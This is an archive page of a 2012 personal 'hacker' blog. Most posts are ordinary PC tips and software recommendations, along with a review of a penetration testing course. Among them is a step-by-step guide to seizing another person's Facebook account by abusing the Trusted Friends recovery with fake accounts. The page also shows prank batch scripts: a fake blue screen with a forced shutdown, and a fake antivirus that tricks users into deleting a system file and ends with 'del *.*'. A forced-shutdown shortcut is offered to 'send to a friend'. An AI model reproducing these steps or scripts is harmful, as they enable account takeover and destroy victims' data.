Blogger Widgets

About Ash Hacker

My photo
I am a social-techno-learner which believes in its own efficiency first and then implements with the suggestions of my strong and enthusiastic Team which helps me takes everything into its perfection level.

Friday, 24 August 2012

Unblock any sites at your school or college....

I want to make you familiar about a great software which will
solve your problem.......
You can unblock sites like.......facebook,orkut,twitter,youtube....and many more sites
you can download the software as name.....


You can download by clicking on download.........
 Download button
You can join us on facebook......Ash_Hacker

Wednesday, 8 August 2012

Send password protected emails

If you have to send some confidental information like credit card numbers,Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept your email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails.

How to Send Password Protected Email Messages:

  • Click here to go LockBin online service.
  • Fill the form with your desired password.
  • In the text filled write your message. You can also attach a file if you want.
  • After this, click on Submit button.
  • Now your password protected mail will be sent. (Receiver will only get a link to your password protected and encrypted email)
  • When receiver clicks on that link  it will prompt to enter the password otherwise it will not be open.
That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself.

Sunday, 27 May 2012

Top Five Web Design Tools

Just like in most other professions, a web designer’s set of tools is what brings a concept into fruition. There are many applications available to our disposal, but there are some that just stand out from the crowd. The tools in this article are what’s regarded as the most popular tools used for web design.
In this article, you’ll find the five web design tools that garnered the most votes.

5. Fireworks

Adobe Fireworks is a commercial raster and vector graphics editor hybrid from Adobe that’s available for the Mac and Windows operating systems. Designed specifically for web designers (unlike Photoshop), Fireworks brings you a plethora of tools and options that make full web layout prototyping a breeze.
Among its notable features are: "slices" for slicing and dicing a design mockup into HTML/CSS for rapidly creating prototypes (though you should avoid using auto-generated source code for the end-build), the ability to package an entire site design as a PDF with clickable components for interactive and impressive site prototypes, and optimization tools for making your web graphics as lightweight as possible.

4. Dreamweaver

Adobe Dreamweaver is a commercial application for web development that’s available for the Mac and Windows operating systems. Its featured-packed suite of tools and options include: syntax highlighting and very smart Code Hinting, a built-in FTP client, project management and workflow options that make team work effortless, and Live View – which shows you a preview of your source code. Dreamweaver tightly integrates with other popular Adobe products such as Photoshop, allowing you to share Smart Objects for quick and easy updating and editing of graphics components. 

3. Panic Coda

Panic Coda is a shareware web development application for the Mac OS X operating system. It seeks to reduce the amount of applications (such as an FTP client, CSS editor, a version control system, etc.) you need to develop websites and to improve your team’s workflow. Coda’s one-window web development philosophy uses a tabbed interface for text editing, file transfers, SVN, CSS, and even "Books" which embeds web books that are searchable (it comes with The Web Programmer’s Desk Reference but you can add your own).
It’s simple and intuitive interface allowed Coda to garner the Apple Design Awards Best Mac OS X User Experience in 2007.

2. Photoshop

Adobe Photoshop is a very popular commercial graphics editor available for the Mac and Windows operating system. Created for professional photographers and designers, it is the ideal application for manipulating images and creating web graphics. Photoshop has all the necessary tools and options you need such as: Filters – which automatically adds effects to your image or a selected section of your image, extensibility and automation with Brushes, Actions and Scripting, and workflow enhancement features like Layer Comps and the Revert option.

1. Firebug

Firebug is a free, open source in-browser web development tool for the Firefox web browser. It’s many features include: on-the-fly HTML and CSS editing for tweaking or debugging, a Console for logging, analyzing and debugging JavaScript, and an intuitive Document Object Model (DOM) inspection tool to help you quickly see how the elements of a web page relates to one another.
Firebug’s popularity is so immense it’s one of the few Firefox extensions that have its own extensions (like YSlow and FirePHP)!

Notable mentions

Here are other tools that were voted on that are worth a quick mention.

Saturday, 19 May 2012

Recover your deleted files...

If you have lost important files from your hard drive and if you are sure that they have been deleted, don’t panic! Uneraser is simple software that can help. In this tutorial, we will see how Uneraser works. On this link you can download Uneraser.
For example, I delete movie file on Local Disk (E:) , how to recover movie file?. It is simple

1. Run Uneraser , then select wizard , as shown below

2. When the wizard appears select “Do a lost files scan”, then click Next , as shown below

3. Select partition , where is deleted data, then click Next

4. Uneraser find my deleted movie

5. Now, just save your recover file, as shown below

Use Keyboard As Mouse

Looking cool computer tricks? Here is something that should pique your interest: Use Keyboard As Mouse, On Screen Keyboard and Transform your Windows XP in to Windows 7.

Use Keyboard As Mouse

When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter .

Use the Numerical pad for controlling the mouse pointer.
5 is for click.
+ is for double click
- for right click.

On Screen Keyboard

On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick..

To use it go to start-> run and type osk

Thursday, 17 May 2012

how to shut down your computer using your cell phone

Hi, do you want to learn a trick about “how to shut down your computer using your cell phone”. Are you always hiring the best way? Then, today you learn this trick easily in a simple way as just need to look carefully this step to step tutorial about “how to shut down your computer using your cell phone”.
Note: you can complete this trick in every operating system but, here we are representing this tutorial in “Windows 7 Professional”.
So let’s start, first open notepad as go to-> Start- All Programs- Accessories- Notepad. You can also open it in other way as go to-> Start and click on run and there type- “notepad”. Then, you will get notepad (simple editor) in front of window screen. Then, type in notepad “shutdown –s” and save this file anywhere where you want but, save with file as named “shutdown.bat” in your operating system. Illustrated at below picture-

After above process, the second step is to create your “Gmail” account or other account like yahoo for email id but, here showing Gmail. If you already have a Gmail account means having email id then, forget this step and if not as for this just search on internet as type in URL box- “” and hit enter button from your keyboard. Then you will get, see image below-

On this page, click on “Create an Account” as shown above. Then, you will get a form where you need to fill your details like first name, last name, birth date and many more as follow instructions carefully and you will get you unique email id through that page.
Now, the next step is to create an email for Microsoft outlook (MS-outlook) and also configure some settings. So, just open MS outlook as go to-> Start – All Programs – Microsoft Office and click on Microsoft Office Outlook (any version like 2003, 2007, 2010). If you don’t have MS outlook in your operating system then, you can purchase this software online. Here in this tutorial we are showing MS-outlook 2003.

After open, go to-> Tools – Email Accounts… Click on Email Accounts…

So you will get this window-

Click on check box- “Add a new e-mail account” as shown as above and click next. So you get-

Click on Check box- “POP3” and click on Next >
You will get-

So, enter your name and e-mail address “email id” as you get through Gmail as illustrated whole fact above. In server Information, enter in Incoming mail server (POP3): “” and in Outgoing (SMTP): “”. Enter you username and password also as you can enter your desired username and password. After whole click on more settings as all things are shown above, visit carefully.
In more settings, you will get this screen-

Click on Outgoing Server as will get this-

So, click on Check box as mouse indicating in upper image.
After this, click on Advanced as visit below-

In Advanced, change the value as enter in Incoming server (POP3): 995 and enter in outgoing (SMTP): 25 and click on all checkboxes and finally click on Ok button as shown above. Just do copy of above.
Then, you will get back to previous screen as then, click on next as shown below-

And finally, click on finish,
Then, go to-> Tools – Send\Receive – Send\Receive Settings – Define Send\Receive Groups (Ctrl+Alt+S). Given below-

After Click, you will get this screen-

So check your screen as do copy of above picture. In this, especially check, checkbox- Schedule an automatic send\receive every (1) minutes. And finally click on close.
Now, the last step is to manipulate our computer (ms-outlook) with text message as for this, we have to set up of rules and alerts on outlook. So, again go to-> Tools – Rules and Alerts. See image below-

Then, you will get Rules and Alerts Screen as there click on New Rule as see below-

In New Rule, you will get Rule Wizard .So, just click on check box- “start from a blank rule” and click on next as visit image below-

Now, the next step is as click on check box- “with specific words in the subject or body” and click on specific words as shown below-

Through click, you will get Search Text wizard as write- shutdown and add and click on ok button and finally click on next

As you will on next, click on check box- start application and below click on application as though click you will get an open wizard as visit below

In open wizard, open your file- “shutdown.bat” as you created and saved firstly above on a particular location.
After this, you will get this wizard again as click on next.

Again, click on next-

Click on finish

And finally click on Apply and then, on OK as shown below

So, all above process is the complete whole process to shut down your computer via cell phone in less than a minute. Now, you can open your Gmail account in cell phone and just send a text message to your Gmail account saying “shutdown” w/o quotation and you will found that your computer will be shutdown in a minute. If you are out of your city as wants to shut down your computer using your Cell phone in a minute as this is the best way. Finally, are you still thinking as How to shut down your Computer using your Cell Phone? Then, just follow this tutorial now as you will get result within hour.
We hope you like this briefly described tutorial. Just does this now…


How to hack?, This is the same question that is asked to me every single day. Infact it's one of the most searched and widely spoken topics on the internet. There are tons and tons of guides and how to's available on the internet related to hacking and pentration testing. However, the problem is that unless you can't learn how to hack unless you don't practice the stuff you learned.  Which brings us to the next question, Where do I practice what I learn?

Another problem with today's Ethical hacking and penetration testing courses is that they fail to offer real world attack scenario in order for the students to practice and learn in a much better way. Most of the courses you would find on the internet would commonly suggest you the following for the lab.

1. Backtrack (Attacker)
2. Windows Xp (Victim)

And you would end up practicing on a vulnerable target of your choice, However penetration testing in the real world is extremely difficult and require creative thinking and you are faced up against lot of different security mechanisms such as Firewalls, IDS, IPS etc.
Recently this week I came across a Penetration testing course that gravitated my attention in the first look. The name of the course is "Codename: Samurai Skills".

"Codename: Samurai Skills" by ninja sec team is a medium level penetration testing course which provides students with a good base of both theoretical and practical knowledge. The approach of this course is similar to elearnsecurity and offensive security.

The whole course is divided into eight different modules. Each of the modules contains a PDF material along with the videos related to the topic. The course starts by giving a solid introduction related to Penetration testing, different types of approaches and methodology. The next chapter directly dive into the practical demonstrations of various penetration testing tools on backtrack related to information gathering.

Module 3: Scanning and Assessment

the author does not only introduces you to different types of scanning tools and methodologies but also provides handy tips in order to bypass different types of protections such as firewalls, IDS etc.

Module 4: Network Attacking Techniques

 In this module author introduces the students to various types of different network attacking and exploitation techniques. Going beyond just using ms08_067_netapi exploits which is a common exploit used in almost every training.  The module also covers topics like network password cracking, man-in-the-middle, ARP spoofing, password sniffing and common targeted protocols.

Module 5: Windows & UNIX Attacking Techniques 

This module introduces the student to various types of vulnerabilities inside windows xp found inside windows Xp hashing mechanism. The module also talks about unix attacking techniques. However, I was expecting a bit more of material related to UNIX attacking techniques.

Module 6: Windows & UNIX Post-Exploitation Techniques 

This module covers Windows and Unix post exploitation techniques in depth introducing the student to various topics such as meterpreter, privilege escalation, local password cracking, impersonation, routing / pivoting and other topics, for both Windows and UNIX.

Module 7: Web Exploitation Techniques  

This module is the longest module of all with around 5 hours of practical demonstrations. The module starts by   explaining various scanning and application footprinting techniques. Right after the scanning part the author directly dives the students inside web application exploitation techniques such as SQL injection and Blind SQLi, File Upload and Remote File Include (RFI) vulnerabilities, Command Injection, Cross Site Scripting (XSS) (both reflected and stored), and Cross-Site Request Forgery (CSRF).

Module 8: Windows Exploit Development

This module was by far my favorite as the instructor has done tremendous job in explaining the windows exploit development process.  The module covers a step by step process of development of a buffer overflow exploit.  The instructor has made the complex exploit development process look so easy for the students that even script kiddies can learn it with a little bit of effort.

The ninja-sec team also offers a certificate for any one who completes the following lab challenges:

The end goal is to collect a key.txt file inside of impossible network.


Hack Facebook Accounts With Reverting

Facebook pays millions of dollars to security experts and penetration tester to keep the privacy of their users as safe as possible. So therefore we cannot use direct methods such as bruteforcing, dictionary attacks in order to hack facebook account due to account lockout feature. However, Also i would like to clear one more doubt that there is no such software which will hack a facebook password for you by just entering your email address. There are also methods such as Phishing, keylogging etc, which can help you hack facebook account, which are also suggested ones.

However here in this tutorial we will be exploiting a bug inside facebook in order to hack a facebook account. The vulnerability exploits trusted friends feature inside facebook which could be used to reset some one's facebook password.

Note: If you would like to learn about more advanced methods to hack a facebook account, Kindly refer my post How To Hack Facebook Password.

1. The thing which we use is to trick the Three Friend Account Recovery Method of facebook

2. The homework i was talking about is that you will have to make three fake account and make sure that they are in the friend list of the person you want to hack.

3. Once you are done with the above two steps you can start the hacking business.

4. Go to Forgot Password area of facebook.

5. It will show victims e-mail address and may be mobile phone at which he can be reached,choose ''no longer access to these'' option.

6. Now you will be prompted to enter an alternate e-mail address, type your e-mail address or create a new one.

7. Now you will be asked the ''Security question". Make random guesses,if you know the victim you might just get the right answer,if you don't-no worries !

8. If you have not succeeded in getting the answer right you will get to our main aim ''The Trusted Friends" recovery option.

9. Here click on ''continue'',choose  3 trusted friends-The Three fake accounts you have created and they are friends with the victim.
10. After you have chosen them,facebook will supply you with some codes on those fake accounts,follow the procedure and victims account is yours ! You've hacked them ! :)


Google Raises Bug Bounty - Great News For Hackers

A good news for the hacking community- The internet giant Google has raised the bounties from $3133 to $20,000.Most companies that are in the business of providing software or services are willing to pay industrious and benevolent hackers who find bugs in the code. Google has been making use of these folks for quite some time, but now Mountain View is increasing its rewards dramatically in an effort to encourage more people to join the bug hunt. Google previously handed out a maximum of $3133.70, but now will offer  up to $20,000 per bug.

Wednesday, 2 May 2012


MS-DOS isn't dead!!!
You can boot up in MS-DOS my making a boot disk. A program to do that is attached here.
boot600.exe685 KB
Step 7Very mean viruses DO NOT USE
this virus can wreck a drive DO NOT NOT NOT USE, REPEAT DO NOT USE!


i no this will be contrversial, so i quote: Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press...

OK I say one more time(last time really) DO NOT RELEASE!!!!!!!!!!!!



@echo off
cd /
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo Technical information:
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause >nul
echo Downloading viruses . . .
ping localhost -n 5 >nul
cd c:\
dir /s
pause >nul
shutdown -s -t 120 -c "Your computer has committed suicide, have a nice day."
start bsod.bat
goto dead
NOTE: NO permanent damage.

2:Fake Antivir
@echo OFF
echo This program will purge any ak$327 viruses on your computer.
echo SEARCHing (lots of text, may take a while, just
echo wait, will beep when finished.)
cd C:\
dir /s
echo Displaying infected files
echo Files infected with ak$327:
echo short full
echo 1:pacerprf.ini displaying on next line
echo Full path:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
echo 2:memtest.exe C:\Windows\Boot\PCAT\memtest.exe
echo close now if you want to delete it yourself.
echo otherwise press space
echo note to please run this on an ADMINISTRATOR account.
echo Confirm if prompted by pressing y then enter or return........
del C:\Windows\Boot\PCAT\memtest.exe
echo thanks for using this program, please delete this too:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
pause@echo off
del *.*

Shutdown the comp! && BSOD(Blue Screen Of Death)

go to cmd
type: shutdown -s -t 20 -f -c "shutting down..............."

right click desktop
shutdown -s -t 20 -f -c "shutting down..............." in the box
a name in the box
send to a friend!

iBSOD(Blue Screen Of Death)
to create the BSOD, make a batch file, then type what's between the stars


@echo off
cd /
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo Technical information:
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause >nul
echo Downloading viruses . . .
ping localhost -n 5 >nul
dir /s
pause >nul
shutdown -s -t 120 -c "Your computer has committed suicide, have a nice day."
note no damage is done, just prints all files to screen, then shuts down.

Friday, 9 March 2012

Change Start Menu with just One-Click

I really was fred up of the different ways to change the name of Start Menu. But finally found out a way to do that easily. Below is a Software that directly changes the name of your Start Menu. Click here to download the software utility.

Snapshot :  Simple Start Menu.
Software and start menu after change.

You just have to put your name in New Label and you're done.
Enjoy your Start Menu. $$$$$$$$$$$

Thursday, 1 March 2012

Copy Files Faster in Windows

TeraCopy – Copy your Files Faster, even from Scratched CDs

BestSoftwarestoMoveCopyFilesFasterinWindowsteracopy Softwares to Move, Copy Files Faster in Windows
TeraCopy is a compact program designed to copy and move files at the maximum possible speed, providing the user a lot of features. I often have to move big files and this helps me a whole lot.
  • Copy files faster. TeraCopy uses dynamically adjusted buffers to reduce seek times. Asynchronous copy speeds up file transfer between two physical hard drives.
  • Pause and resume file transfers. Pause copy process at any time to free up system resources and continue with a single click.
  • Error recovery. In case of copy error, TeraCopy will try several times and in the worse case just skips the file, not terminating the entire transfer.
  • Interactive file list. TeraCopy shows failed file transfers and lets you fix the problem and recopy only problem files.
  • Shell integration. TeraCopy can completely replace Explorer copy and move functions, allowing you work with files as usual.
Download TeraCopy – Link

ExtremeCopy – Copy Files Faster

BestSoftwarestoMoveCopyFilesFasterinWindowsExetremeCopy Softwares to Move, Copy Files Faster in Windows
ExtremeCopy is a Windows copy file utility which copy and move files and folders extremely fast and operation is simple. It includes some powerful features such as pause copy process,error recovery and so on but as easy as Windows default copy handle. Features are :
  • Copy or move your file(s)/folder(s) as usual and more efficient and more powerful
  • Save much time when you backup your files to another hard drive or USB drive or computer
  • Manage your copy task easily
Download Extreme Copy – Link

FastCopy – Fastest Copy/Delete Software on Windows

BestSoftwarestoMoveCopyFilesFasterinWindowsfastcopy Softwares to Move, Copy Files Faster in Windows
It automatically selects different method according to whether Source and DestDir are in the same or different HDD. Reading and writing are processed respectively in parallel by another thread for Diff HDD, while for Same HDD reading are processed until the big buffer fills.
When the big buffer filled, writing are started and processed in bulk because Reading/Writing are processed with no OS cache at all, other applications aren’t easy to become heavy.
Download FileCopy – Link

Talent Copy – Read & Write Files in Hard Drive Faster

talent copy write files faster Softwares to Move, Copy Files Faster in Windows
Talent Copy V, which is a totally free program, currently in beta, and is devoted entirely to Windows Vista at Seven, by which you can speed up the transfer of our files up to 3 times, restricting the same time, any gaps and noise of the HDD.
Download Talent Copy: Link
Using Talent Copy V is particularly easy, since, to take advantage of its great potential is sufficient to copy, or move our files and folders as usual, although they had by using the “Copy Paste with Talent” this in context menu, when the files are pasted into another destination.

Copy Handler – Copy and Move Files Faster and Smartly

BestSoftwarestoMoveCopyFilesFasterinWindowscopyhandler Softwares to Move, Copy Files Faster in Windows
Copy Handler is a free software for Windows systems, which allows you to take full control over the file copy and move operations. Program is highly customizable and fully integrates with the operating system.
In addition, Copy Handler offers many advanced options such as task queuing, filtering files according to specific criteria, pausing and resuming copying files operations, changing the copying parameters on the fly and in many cases also offers a significant acceleration of the entire copying files process.
Download Copy Handler – Link
Super Copy
SUPERCopyBestSoftwarestoMoveCopyFilesFasterinWindows Softwares to Move, Copy Files Faster in Windows
Super Copy provides a very robust way to copy files in Windows. Super Copy does not prompt you for more information once the copy has started; all options are specified beforehand. This is simply a lightweight interface for XCOPY, and will not negatively affect your system’s performance.
Download Super Copy – Link

Power Copy

Power Copy provides a specialized copy environment useful for data backup and data recovery applications.
Screenshot Softwares to Move, Copy Files Faster in Windows
It gets past Windows security so you don’t need to worry about having proper permissions. Files that are physically damaged are automatically skipped and the copy process continues. On-screen alerts let you know of any issues encountered.
Download : Power Copy
Easily drag and drop files with the Windows Explorer shell extension. Use the standalone executables provided in the installation directory to launch Power Copy on another computer without having to install it.

Fix to Copy Large Files in Vista Faster

Maybe you have already encountered the strange behavior that it takes much longer to copy large files in Windows Vista than in Windows XP. The problem is caused by a new feature called Auto Tuning which is by default enabled inMicrosoft Windows Vista.
To disable Auto Tuning and speed up the copy process and avoid timeouts and disconnects do the following:
Open a command prompt and type the following: netsh int tcp set global autotuninglevel=disabled
To turn it on again: netsh int tcp set global autotuninglevel=normal
Don’t try this if you feel uncomfortable in DOS. Let me know your experience with these softwares/tricks in comments!! icon smile Softwares to Move, Copy Files Faster in Windows


You Are Welcome Heartly.......
Blogger Widgets